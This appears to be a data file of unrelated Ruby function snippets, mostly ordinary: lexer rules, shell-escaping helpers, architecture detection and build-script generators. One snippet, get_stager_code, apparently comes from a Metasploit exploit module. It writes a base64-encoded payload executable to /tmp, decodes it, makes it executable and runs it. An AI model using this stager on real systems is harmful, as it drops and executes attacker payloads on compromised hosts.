"def octal_esc!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 8 )\n\n \n # - - - - main rule block - - - -\n # at line 302:5: ( '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) )\n alt_3 = 3\n look_3_0 = @input.peek( 1 )\n\n if ( look_3_0 == 0x5c )\n look_3_1 = @input.peek( 2 )\n\n if ( look_3_1.between?( 0x30, 0x33 ) )\n look_3_2 = @input.peek( 3 )\n\n if ( look_3_2.between?( 0x30, 0x37 ) )\n look_3_4 = @input.peek( 4 )\n\n if ( look_3_4.between?( 0x30, 0x37 ) )\n alt_3 = 1\n else\n alt_3 = 2\n end\n else\n alt_3 = 3\n end\n elsif ( look_3_1.between?( 0x34, 0x37 ) )\n look_3_3 = @input.peek( 3 )\n\n if ( look_3_3.between?( 0x30, 0x37 ) )\n alt_3 = 2\n else\n alt_3 = 3\n end\n else\n raise NoViableAlternative( \"\", 3, 1 )\n end\n else\n raise NoViableAlternative( \"\", 3, 0 )\n end\n case alt_3\n when 1\n # at line 302:9: '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n # at line 302:14: ( '0' .. '3' )\n # at line 302:15: '0' .. '3'\n match_range( 0x30, 0x33 )\n\n # at line 302:25: ( '0' .. '7' )\n # at line 302:26: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n # at line 302:36: ( '0' .. '7' )\n # at line 302:37: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n when 2\n # at line 303:9: '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n # at line 303:14: ( '0' .. '7' )\n # at line 303:15: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n # at line 303:25: ( '0' .. '7' )\n # at line 303:26: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n when 3\n # at line 304:9: '\\\\\\\\' ( '0' .. '7' )\n match( 0x5c )\n # at line 304:14: ( '0' .. '7' )\n # at line 304:15: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 8 )\n\n end",
"def escape_sequence!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 74 )\n\n\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 587:7: ( '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' ) | UnicodeEscape | OctalEscape )\n alt_23 = 3\n look_23_0 = @input.peek( 1 )\n\n if ( look_23_0 == 0x5c )\n case look_23 = @input.peek( 2 )\n when 0x22, 0x27, 0x5c, 0x62, 0x66, 0x6e, 0x72, 0x74 then alt_23 = 1\n when 0x75 then alt_23 = 2\n when 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37 then alt_23 = 3\n else\n raise NoViableAlternative( \"\", 23, 1 )\n\n end\n else\n raise NoViableAlternative( \"\", 23, 0 )\n\n end\n case alt_23\n when 1\n # at line 587:11: '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' )\n match( 0x5c )\n if @input.peek(1) == 0x22 || @input.peek(1) == 0x27 || @input.peek(1) == 0x5c || @input.peek(1) == 0x62 || @input.peek(1) == 0x66 || @input.peek(1) == 0x6e || @input.peek(1) == 0x72 || @input.peek(1) == 0x74\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 2\n # at line 588:11: UnicodeEscape\n unicode_escape!\n\n\n when 3\n # at line 589:11: OctalEscape\n octal_escape!\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 74 )\n\n\n end",
"def arch(internal = false)\n internal ? '64-bit' : 'x86_64'\n end",
"def e_sh(str)\n str.to_s.gsub(/(?=[^a-zA-Z0-9_.\\/\\-\\x7F-\\xFF\\n])/n, '\\\\').gsub(/\\n/, \"'\\n'\").sub(/^$/, \"''\")\nend",
"def arch\n @header.arch\n end",
"def architecture(file)\n return :invalid unless File.exist?(file)\n\n f = File.open(file)\n str = ELFTools::ELFFile.new(f).machine\n {\n 'Advanced Micro Devices X86-64' => :amd64,\n 'Intel 80386' => :i386,\n 'ARM' => :arm,\n 'AArch64' => :aarch64,\n 'MIPS R3000' => :mips\n }[str] || :unknown\n rescue ELFTools::ELFError # not a valid ELF\n :invalid\n ensure\n f&.close\n end",
"def to_shellwords\n argv = []\n argv << %[--autopath] if autopath?\n argv << %[--verbose] if verbose?\n argv << %[--format=\"#{format}\"] if format\n argv << %[--chdir=\"#{chdir}\"] if chdir\n argv << %[--tags=\"#{tags.join(';')}\"] unless tags.empty?\n argv << %[--match=\"#{match.join(';')}\"] unless match.empty?\n argv << %[--units=\"#{units.join(';')}\"] unless units.empty?\n argv << %[--loadpath=\"#{loadpath.join(';')}\"] unless loadpath.empty?\n argv << %[--requires=\"#{requires.join(';')}\"] unless requires.empty?\n argv << files.join(' ') unless files.empty?\n argv\n end",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app. But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/bash '\n f.puts ' '\n f.puts 'function fcomp() '\n f.puts '{ '\n f.puts ' awk -v n1=$1 -v n2=$2 \\'BEGIN{ if (n1 == n2) print \"yes\"; else print \"no\"}\\' '\n f.puts '} '\n f.puts ' '\n f.puts 'function multiplyArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' mulResult=`echo $input1 $input2 | awk \\'{printf \"%d\", $1*$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function divideArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' divResult=`echo $input1 $input2 | awk \\'{printf \"%.2f\", $1/$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function scaleArgs() '\n f.puts '{ '\n f.puts ' inputToken=$1 '\n f.puts ' factor=$2 '\n f.puts ' numberToken=`echo $inputToken | tr -cd [0-9] ` '\n f.puts ' argPrefix=`echo $inputToken | sed -e \\'s/m$//g\\' | tr -cd [a-zA-Z-+:=] ` '\n f.puts ' multiplyArgs $numberToken $factor '\n f.puts ' # Result saved in mulResult variable '\n f.puts ' scaled_number=$mulResult '\n f.puts ' scaled_token=${argPrefix}${scaled_number}m '\n f.puts '} '\n f.puts ' '\n f.puts '# There are 5 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s /home/vcap/app /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n end\n end",
"def get_filecode()\n \"__EMIT_#{ARGV[0].gsub(/[^\\w]/, \"_\").upcase}__\"\nend",
"def octal_escape!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 75 )\n\n\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 594:7: ( '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) )\n alt_24 = 3\n look_24_0 = @input.peek( 1 )\n\n if ( look_24_0 == 0x5c )\n look_24_1 = @input.peek( 2 )\n\n if ( look_24_1.between?( 0x30, 0x33 ) )\n look_24_2 = @input.peek( 3 )\n\n if ( look_24_2.between?( 0x30, 0x37 ) )\n look_24_4 = @input.peek( 4 )\n\n if ( look_24_4.between?( 0x30, 0x37 ) )\n alt_24 = 1\n else\n alt_24 = 2\n\n end\n else\n alt_24 = 3\n\n end\n elsif ( look_24_1.between?( 0x34, 0x37 ) )\n look_24_3 = @input.peek( 3 )\n\n if ( look_24_3.between?( 0x30, 0x37 ) )\n alt_24 = 2\n else\n alt_24 = 3\n\n end\n else\n raise NoViableAlternative( \"\", 24, 1 )\n\n end\n else\n raise NoViableAlternative( \"\", 24, 0 )\n\n end\n case alt_24\n when 1\n # at line 594:11: '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x33 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 2\n # at line 595:11: '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 3\n # at line 596:11: '\\\\\\\\' ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 75 )\n\n\n end",
"def bash_on_windows?; end",
"def get_stager_code\r\n b64_fname = \"/tmp/#{Rex::Text.rand_text_alpha(6)}.bin\"\r\n bin_fname = \"/tmp/#{Rex::Text.rand_text_alpha(5)}.bin\"\r\n register_file_for_cleanup(b64_fname, bin_fname)\r\n p = Rex::Text.encode_base64(generate_payload_exe)\r\n\r\n c = \"File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; \"\r\n c << \"%x(base64 --decode #{b64_fname} > #{bin_fname}); \"\r\n c << \"%x(chmod +x #{bin_fname}); \"\r\n c << \"%x(#{bin_fname})\"\r\n c\r\n end",
"def ruby_path_escape( path )\n if (@os == :mac)\n '\"' + path + '\"'\n else\n # Adapt to other OSs if necessary\n '\"' + path + '\"'\n end\n end",
"def cow_to_codename_arch(cow)\n /^base-(.*)-(.*)\\.cow$/.match(cow).captures\n end",
"def build_flags_cross\n # Unclear if we need config_site CONFIG_SITE=/etc/dpkg-cross/cross-config.i386\n [] << '-a' << cross_arch\n end",
"def get_arch\n arch = `uname -m`\n if arch.include?(\"64\")\n return \"64\"\n else\n return \"32\"\n end\nend",
"def machine_arch(arg = nil)\n set_or_return(:machine_arch, arg, kind_of: String, required: true)\n end",
"def linux_version\n case ENV['MACHTYPE']\n when \"s390x-suse-linux\"\n :sles_zlnx\n when /^i[356]86/\n if File.exist? \"/etc/fedora-release\"\n :linux_ia32_cell\n else\n :linux_ia32\n end\n else\n if File.exist? \"/etc/rhel-release\"\n :rhel\n elsif File.exist? \"/etc/redhat-release\"\n `awk '/release 5/||/release 4.9/{v=5};/release 4/{v=4}; END {print \"rhel\" v}' /etc/redhad-release`.to_sym\n elsif File.exist? \"/etc/SuSE-release\"\n `awk '$1==\"VERSION\" { v=$3}; END { print \"sles\" v}' /etc/SuSE-release`.to_sym\n elsif File.exist? \"/etc/yellowdog-release\"\n :yhpc\n else\n :rhel\n end\n end\nend",
"def redhat_linux_type\n if @redhat_linux_type.nil?\n out = nil\n text = FilePath.new(\"/etc/redhat-release\").suck_file\n unless text.nil?\n if text =~ /red\\s*hat/i\n out = \"rh\"\n out += \"el\" if text =~ /enterprise/i\n out += \"es\" if text =~ /\\s+ES\\s+/i\n out += \"%s\" % $1 if text =~ /release\\s+(\\d+)/i\n out += \"-update-%s\" % $1 if text =~ /update\\s+(\\d+)/i\n end\n end\n \n @redhat_linux_type = out\n end\n \n @redhat_linux_type\n end",
"def supported_archs\n @supported_archs ||= Dir.glob(File.join(__dir__, 'consts', 'sys_nr', '*.rb'))\n .map { |f| File.basename(f, '.rb').to_sym }\n .sort\n end",
"def escape_shell_string(str)\n str = str.gsub(/\\\\/, \"\\\\\\\\\\\\\")\n str = str.gsub(/\"/, \"\\\\\\\"\")\n str = str.gsub(/`/, \"\\\\`\")\n str = str.gsub(/;/, \"\\\\;\")\n str = str.gsub(/&/, \"\\\\&\")\n str = str.gsub(/\\|/, \"\\\\|\")\n str = str.gsub(/\\$/, \"\\\\$\")\n str = str.gsub(/ /, \"\\\\ \")\n str\n end",
"def generate_ruby sexp\n ruby = Ruby2Ruby.new.process(sexp)\n ruby.sub!(/\\A(def \\S+)\\(([^\\)]*)\\)/, '\\1 |\\2|') # move args\n ruby.sub!(/\\Adef[^\\n\\|]+/, 'proc { ') # strip def name\n ruby.sub!(/end\\Z/, '}') # strip end\n ruby.gsub!(/\\s+$/, '') # trailing WS bugs me\n ruby\n end",
"def escape_shell(str)\n case RUBY_PLATFORM\n when /mswin32|bccwin32/\n escape_shell_windows(str)\n else\n escape_shell_unix(str)\n end\n end",
"def pre_process_action(action_path, payload_path = nil)\n lb = line_break\n env = @platform_info[\"environment_set\"]\n cmt = @platform_info[\"comment_char\"]\n language = @platform_info[\"language\"]\n shebang = \"\"\n content = File.open(action_path).read\n content = ERB.new(content).result(binding)\n items = content.scan(/^\\s*\\#\\!.*/)\n shebang = items[0] if items.size > 0\n if payload_path\n @transfer_properties[\"RPM_PAYLOAD\"] = payload_path\n end\n env_header = \"#{cmt} Environment vars to define#{lb}\"\n @standard_properties.each{|prop| @transfer_properties[prop] = @p.get(prop) }\n @transfer_properties.each do |key,val|\n env_header += \"#{env}#{key}=#{val}#{lb}\" if language == \"batch\"\n env_header += \"#{env}#{key}=\\\"#{val}\\\"#{lb}\" unless language == \"batch\"\n end\n file_content = \"#{shebang}#{lb}#{env_header}#{lb}#{content}\"\n fil = File.open(action_path,\"w+\")\n fil.puts file_content\n fil.flush\n fil.close\n file_content\n end",
"def arch_to_s\n\t\treturn arch.join(\", \")\n\tend",
"def assembler_options(src, component, system_config)\n config = system_config.platform_config(component.platform)\n output = object_file(src, component, system_config)\n opts = config[\"assembler_options\"].split(\" \")\n opts << \"#{config[\"assembler_out\"]}#{output}\"\n opts += prefixed_objects(component.include_paths, config[\"assembler_include\"])\n opts << src\n end",
"def get_p4_os_directory\n architecture = new_resource.sixty_four ? \"x86_64\" : \"x86\"\n case node[:os]\n when \"linux\"\n os = \"linux26#{architecture}\"\n when \"darwin\"\n os = \"darwin90#{architecture}\"\n when \"windows\"\n architecture = new_resource.sixty_four ? \"x64\" : \"x86\"\n os = \"nt#{architecture}\"\n end\n \"bin.#{os}\"\nend",
"def arch\n if windows? && windows_arch_i386?\n \"i386\"\n elsif solaris?\n if intel?\n \"i386\"\n elsif sparc?\n \"sparc\"\n end\n else\n Ohai[\"kernel\"][\"machine\"]\n end\n end",
"def texify exec_trace\n document_text = \"\"\n File.open \"preamble.tex\" do |file|\n while line = file.gets\n document_text += line\n end\n end\n document_text += \"\\\\begin{document}\\n\"\n stages = get_stages exec_trace\n stages.each do |stage|\n document_text += \"\\\\begin{frame}\\n\\n\"\n document_text += state_text stage.i_heap, stage.i_store\n document_text += \"\\n\"\n document_text += \"Current command: \"\n document_text += \"\\\\il{#{stage.text}}\"\n document_text += \"\\n\"\n document_text += \"\\\\vspace{1cm}\\n\\n\"\n document_text += state_text stage.f_heap, stage.f_store\n document_text += \"\\\\end{frame}\"\n document_text += \"\\n\"\n end\n document_text\nend",
"def parsed_sv_bin\n return new_resource.sv_bin if new_resource.sv_bin\n '/usr/bin/sv'\n end",
"def shabang_or_fallback(interpreter)\n if interpreter == \"/bin/bash\"\n Chef::Log.warn(\"Yum executable interpreter is /bin/bash. Falling back to default python.\")\n \"/usr/bin/python\"\n else\n interpreter\n end\n end",
"def interpret(source)\n c = compile(source)\n ci = cifrom(c)\n ci.run\nend",
"def make_universal(file_path, this_arch, other_arch)\n other_arch_file = file_path.sub(this_arch, other_arch) # create file path for other architecture...\n universal_file = file_path.sub(this_arch, 'universal') # ...and universal architecture\n run_cmd \"lipo #{file_path} #{other_arch_file} -create -output #{universal_file}\"\n run_cmd \"lipo -info #{universal_file}\"\n end",
"def build_wrapper_script(os_platform, shebang, properties)\n msg = \"Environment variables from BRPM\"\n wrapper = \"srun_wrapper_#{@rpm.precision_timestamp}\"\n cmd = shebang[\"cmd\"]\n target = File.basename(@params[\"SS_script_file\"])\n cmd = cmd.gsub(\"%%\", target) if shebang[\"cmd\"].end_with?(\"%%\")\n cmd = \"#{cmd} #{target}\" unless shebang[\"cmd\"].end_with?(\"%%\")\n if os_platform =~ /win/\n properties[\"RPM_CHANNEL_ROOT\"] = @rpm.dos_path(properties[\"RPM_CHANNEL_ROOT\"])\n properties[\"VL_CHANNEL_ROOT\"] = properties[\"RPM_CHANNEL_ROOT\"]\n wrapper = \"#{wrapper}.bat\"\n script = \"@echo off\\r\\necho |hostname > junk.txt\\r\\nset /p HOST=<junk.txt\\r\\nrm junk.txt\\r\\n\"\n script += \"echo ============== HOSTNAME: %HOST% ==============\\r\\n\"\n script += \"echo #{msg} \\r\\n\"\n properties.each{|k,v| script += \"set #{k}=#{v}\\r\\n\" }\n script += \"echo Execute the file\\r\\n\"\n script += \"cd %RPM_CHANNEL_ROOT%\\r\\n\"\n script += \"#{cmd}\\r\\n\"\n script += \"timeout /T 500\\r\\necho y | del #{target}\\r\\n\"\n else\n wrapper = \"#{wrapper}.sh\"\n script = \"echo \\\"============== HOSTNAME: `hostname` ==============\\\"\\n\"\n script += \"echo #{msg} \\n\"\n properties.each{|k,v| script += \"export #{k}=\\\"#{v}\\\"\\n\" }\n script += \"echo Execute the file\\n\"\n script += \"cd $RPM_CHANNEL_ROOT\\n\"\n script += \"#{cmd}\\n\" \n script += \"sleep 2\\nrm -f #{target}\" \n end\n fil = File.open(File.join(@output_dir, wrapper),\"w+\")\n fil.puts script\n fil.flush\n fil.close\n File.join(@output_dir, wrapper)\nend",
"def gene_compatible_shell\n \trequire 'find'\n \trequire 'json'\n \tshells = {}\n \t#Read shells' info from SPEC files\n \tFind.find(File.expand_path(\"#{Dir.home}/.hcode/repos/\")) do |path|\n \t if path =~ /.*hcode\\.spec$/\n \t json = File.read(path)\n spec = JSON.parse(json)\n \t if(spec[\"type\"] == \"shell\")\n \t shell = {}\n \t shell[:name] = spec[\"name\"]\n shell[:compatible_shell] = Hash.new\n \t if (spec[\"compatible_shell\"] != nil)\n \t spec[\"compatible_shell\"].each{|k, v|\n \t shell[:compatible_shell][k] = v\n \t }\n \t end\n \t shells[shell[:name]] = shell\n \t end\n \t end\n \tend\n\n shells.each{|k_i,v_i|\n v_i[:compatible_shell].each{|k_j, v_j|\n if(shells[k_j] != nil)\n shells[k_j][:compatible_shell][k_i] = v_j\n else\n puts \"No shell exist: #{k_j}\"\n end\n }\n }\n\n File.open(File.expand_path(\"#{Dir.home}/.hcode/compatible_shell.json\"), 'w') { |fo| \n fo.puts shells.to_json\n }\n end",
"def get_linux_version_info(iso_file_name)\n iso_info = File.basename(iso_file_name)\n if iso_file_name.match(/purity/)\n iso_info = iso_info.split(/_/)\n else\n iso_info = iso_info.split(/-/)\n end\n linux_distro = iso_info[0]\n linux_distro = linux_distro.downcase\n if linux_distro.match(/^sle$/)\n linux_distro = \"sles\"\n end\n if linux_distro.match(/oraclelinux/)\n linux_distro = \"oel\"\n end\n if linux_distro.match(/centos|ubuntu|sles|sl|oel|rhel/)\n if linux_distro.match(/sles/)\n if iso_info[2].match(/Server/)\n iso_version = iso_info[1]+\".0\"\n else\n iso_version = iso_info[1]+\".\"+iso_info[2]\n iso_version = iso_version.gsub(/SP/,\"\")\n end\n else\n if linux_distro.match(/sl$/)\n iso_version = iso_info[1].split(//).join(\".\")\n if iso_version.length == 1\n iso_version = iso_version+\".0\"\n end\n else\n if linux_distro.match(/oel|rhel/)\n if iso_file_name =~ /-rc-/\n iso_version = iso_info[1..3].join(\".\")\n iso_version = iso_version.gsub(/server/,\"\")\n else\n iso_version = iso_info[1..2].join(\".\")\n iso_version = iso_version.gsub(/[a-z,A-Z]/,\"\")\n end\n iso_version = iso_version.gsub(/^\\./,\"\")\n else\n iso_version = iso_info[1]\n end\n end\n end\n case iso_file_name\n when /i[3-6]86/\n iso_arch = \"i386\"\n when /x86_64/\n iso_arch = \"x86_64\"\n else\n if linux_distro.match(/centos|sl$/)\n iso_arch = iso_info[2]\n else\n if linux_distro.match(/sles|oel/)\n iso_arch = iso_info[4]\n else\n iso_arch = iso_info[3]\n iso_arch = iso_arch.split(/\\./)[0]\n if iso_arch.match(/amd64/)\n iso_arch = \"x86_64\"\n else\n iso_arch = \"i386\"\n end\n end\n end\n end\n else\n if linux_distro.match(/fedora/)\n iso_version = iso_info[1]\n iso_arch = iso_info[2]\n else\n if linux_distro.match(/purity/)\n iso_version = iso_info[1]\n iso_arch = \"x86_64\"\n else\n if linux_distro.match(/vmware/)\n iso_version = iso_info[3].split(/\\./)[0..-2].join(\".\")\n iso_update = iso_info[3].split(/\\./)[-1]\n iso_release = iso_info[4].split(/\\./)[-3]\n iso_version = iso_version+\".\"+iso_update+\".\"+iso_release\n iso_arch = \"x86_64\"\n else\n iso_version = iso_info[2]\n iso_arch = iso_info[3]\n end\n end\n end\n end\n return linux_distro,iso_version,iso_arch\nend",
"def build\n so_name = self.so_name\n so_exists = File.file? so_name\n unless so_exists and File.mtime(rb_file) < File.mtime(so_name) then\n\n unless File.directory? Inline.directory then\n warn \"NOTE: creating #{Inline.directory} for RubyInline\" if $DEBUG\n Dir.mkdir Inline.directory, 0700\n end\n\n src_name = \"#{Inline.directory}/#{module_name}.c\"\n old_src_name = \"#{src_name}.old\"\n should_compare = File.write_with_backup(src_name) do |io|\n if @include_ruby_first\n @inc.unshift \"#include \\\"ruby.h\\\"\"\n else\n @inc.push \"#include \\\"ruby.h\\\"\"\n end\n\n io.puts\n io.puts @inc.join(\"\\n\")\n io.puts\n io.puts @src.join(\"\\n\\n\")\n io.puts\n io.puts\n io.puts \"#ifdef __cplusplus\"\n io.puts \"extern \\\"C\\\" {\"\n io.puts \"#endif\"\n io.puts \" __declspec(dllexport)\" if WINDOZE\n io.puts \" void Init_#{module_name}() {\"\n io.puts \" VALUE c = rb_cObject;\"\n\n # TODO: use rb_class2path\n # io.puts \" VALUE c = rb_path2class(#{@mod.name.inspect});\"\n io.puts @mod.name.split(\"::\").map { |n|\n \" c = rb_const_get(c,rb_intern(\\\"#{n}\\\"));\"\n }.join(\"\\n\")\n\n @sig.keys.sort.each do |name|\n arity, singleton, method_name = @sig[name]\n if singleton then\n io.print \" rb_define_singleton_method(c, \\\"#{method_name}\\\", \"\n else\n io.print \" rb_define_method(c, \\\"#{method_name}\\\", \"\n end\n io.puts \"(VALUE(*)(ANYARGS))#{name}, #{arity});\"\n end\n io.puts @init_extra.join(\"\\n\") unless @init_extra.empty?\n\n io.puts\n io.puts \" }\"\n io.puts \"#ifdef __cplusplus\"\n io.puts \"}\"\n io.puts \"#endif\"\n io.puts\n end\n\n # recompile only if the files are different\n recompile = true\n if so_exists and should_compare and\n FileUtils.compare_file(old_src_name, src_name) then\n recompile = false\n\n # Updates the timestamps on all the generated/compiled files.\n # Prevents us from entering this conditional unless the source\n # file changes again.\n t = Time.now\n File.utime(t, t, src_name, old_src_name, so_name)\n end\n\n if recompile then\n\n hdrdir = %w(srcdir archdir rubyhdrdir).map { |name|\n Config::CONFIG[name]\n }.find { |dir|\n dir and File.exist? File.join(dir, \"/ruby.h\")\n } or abort \"ERROR: Can't find header dir for ruby. Exiting...\"\n\n flags = @flags.join(' ')\n libs = @libs.join(' ')\n\n config_hdrdir = if RUBY_VERSION > '1.9' then\n \"-I #{File.join hdrdir, RbConfig::CONFIG['arch']}\"\n else\n nil\n end\n\n cmd = [ Config::CONFIG['LDSHARED'],\n flags,\n Config::CONFIG['CCDLFLAGS'],\n Config::CONFIG['CFLAGS'],\n '-I', hdrdir,\n config_hdrdir,\n '-I', Config::CONFIG['includedir'],\n \"-L#{Config::CONFIG['libdir']}\",\n '-o', so_name.inspect,\n File.expand_path(src_name).inspect,\n libs,\n crap_for_windoze ].join(' ')\n\n # TODO: remove after osx 10.5.2\n cmd += ' -flat_namespace -undefined suppress' if\n RUBY_PLATFORM =~ /darwin9\\.[01]/\n cmd += \" 2> #{DEV_NULL}\" if $TESTING and not $DEBUG\n\n warn \"Building #{so_name} with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? 
!= 0 then\n bad_src_name = src_name + \".bad\"\n File.rename src_name, bad_src_name\n raise CompilationError, \"error executing #{cmd.inspect}: #{$?}\\nRenamed #{src_name} to #{bad_src_name}\"\n end\n\n # NOTE: manifest embedding is only required when using VC8 ruby\n # build or compiler.\n # Errors from this point should be ignored if Config::CONFIG['arch']\n # (RUBY_PLATFORM) matches 'i386-mswin32_80'\n if WINDOZE and RUBY_PLATFORM =~ /_80$/ then\n Dir.chdir Inline.directory do\n cmd = \"mt /manifest lib.so.manifest /outputresource:so.dll;#2\"\n warn \"Embedding manifest with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n raise CompilationError, \"error executing #{cmd}: #{$?}\"\n end\n end\n end\n\n warn \"Built successfully\" if $DEBUG\n end\n\n else\n warn \"#{so_name} is up to date\" if $DEBUG\n end # unless (file is out of date)\n end",
"def target_ruby; end",
"def transcode_script_header\n <<~HEREDOC\n #!/bin/sh\n\n # Check this file, make any changes, and save it. Execute it directly,\n # or execute it with the sh command if it's not executable.\n\n set -e\n\n HEREDOC\n end",
"def repack_linux arch\n @options['app'] = $script_path\n @options['arch'] = arch\n @options['dnlhost'] = @dnlhost\n @options['dnlpath'] = \"/public/select/#{arch}.rb\"\n @options['packtmp'] = LIB_DIR\n @options['relname'] = Shoes::RELEASE_NAME\n @options['shoesdist'] = @work_path\n PackShoes.repack_linux @options do |msg|\n @pkgstat.text = msg\n end\n @pkgstat = inscription \"Done packaging #{$script_path} for Linux #{arch}\"\n end",
"def patch_wrapper_script(prog)\n\t\twrapper_script_header = <<-WRAPPER_SCRIPT_HEADER\n#!/bin/bash\n\nexport LANG=en_US.UTF-8\nexport LANGUAGE=en_US.UTF-8\nexport LC_ALL=en_US.UTF-8\n\nCOMMONSDIR=\"#{HOMEBREW_PREFIX.join('opt', 'hets-commons')}\"\nPROGDIR=\"#{prefix}\"\nPROG=\"#{prog}\"\n\n[[ -z ${HETS_JNI_LIBS} ]] && \\\\\n\t\t HETS_JNI_LIBS=\"#{HOMEBREW_PREFIX.join('opt', 'factplusplus')}\"\nWRAPPER_SCRIPT_HEADER\n\n\t\t# Replace the header until (including) the line starting with PROG=\n\t\tinreplace(bin.join(prog), /\\A.*PROG=[^\\n]*$/m, wrapper_script_header)\n inreplace(bin.join(prog), 'BASEDIR', 'COMMONSDIR')\n inreplace(bin.join(prog), /PELLET_PATH=.*$/, \"PELLET_PATH=#{HOMEBREW_PREFIX.join('opt', 'pellet', 'bin')}\")\n inreplace(bin.join(prog), /^\\s*exec\\s+([\"']).*COMMONSDIR[^\\/]*/, 'exec \\1${PROGDIR}')\n end",
"def d(ruby_str)\n puts RubyVM::InstructionSequence.new(ruby_str).disasm\nend",
"def actual_arch\n arch = nil\n\n if explicit_arch.nil? == false\n arch = explicit_arch\n elsif datastore['ARCH']\n arch = datastore['ARCH']\n elsif assoc_exploit\n arch = assoc_exploit.target_arch || ARCH_X86\n end\n\n # If we still have an invalid architecture, then we suck.\n if arch.nil?\n raise NoCompatiblePayloadError, \"An architecture could not be determined by the generic payload\"\n elsif arch.kind_of?(String)\n arch = [ arch ]\n end\n\n return arch\n end",
